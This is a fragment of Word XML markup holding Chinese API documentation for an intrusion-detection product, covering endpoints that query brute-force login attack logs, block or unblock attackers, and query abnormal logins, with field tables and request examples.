          </w:tcPr>
          <w:p w14:paraId="1F07C825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A778DC6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79473CDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>crackId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CF6BD4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C93D10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233885F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击ID（查询结果接口返回的id字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6786BE3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D3E25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/brutecrack/linux/log?page=0&amp;size=50&amp;crackId=tFU7aUo3o5w7GDPlJqQfMA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385E151" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221AC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginTime": 1531392352,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "reason": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uname": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "status": -10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "block": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "blockDuration": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D16CF2"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556"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="58E709C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D4D690A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DC38F67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52615C67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C22AA2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="270BD384" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="326F6007" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C3B79E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706828BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F02D6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="079D64F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BBE40C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC7D342" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390050F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2EB9DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录失败原因，1：用户名不存在</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="545AF0ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3675F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1057C38C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F5844A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E0C7BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D5E3289" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD9A371" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B5FFCBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6FE4EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAE6B7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="48E75E3F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51C59E7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255E10D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B872AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531432A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停状态，见《封停状态字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1876011B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F177837" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blockDuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726BD44F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBCBE21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD6D354" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停时间，单位秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02151625" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="封停解封操作"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r>
        <w:t>封停/解封操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF38CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows暴力破解封停/解封操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332BC29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C693768" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/brutecrack/{linux,win}/block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F4156"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727"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2348"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="07994CA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BFA4EB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA9BCF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C2E8FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E70C744" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="491320D2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1D768F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485A1D05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44183730" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7009F544" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58947D23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DDF0083" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2394D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431170F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F26A4FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作类型:0-解封;1-封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="539191E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12969A11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "block": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A14788" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441FF93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "block": 6,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F69C11"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727"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3D56BEA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9CE2712" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BDB0C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C33E14B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="599BB320" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DD06A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1155036C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0570F60B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7275FC3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4533B621" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDEF238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FF2D34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="暴力破解封停状态">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>封停状态</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="335A4331" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D08E09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t># 入侵检测-暴力破解-封停/解封操作接口调用的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def brutecrack_block():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/detect/brutecrack/linux/block" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'id': 'tFU7aUo3o5w7GDPlJqQfMA==', 'block': 1}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5C3F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009AB1C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>当agent不在线的时候，接口返回500， agent不在线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A29567" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>处于封停/解封中的项不能再进行封停/解封操作，否则会抛出异常及提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A6B27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="异常登录"/>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>异常登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDC190" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="查询结果-3"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F777AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6CA77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A820DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/abnormallogin/{linux,win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5CF6A4"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173"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
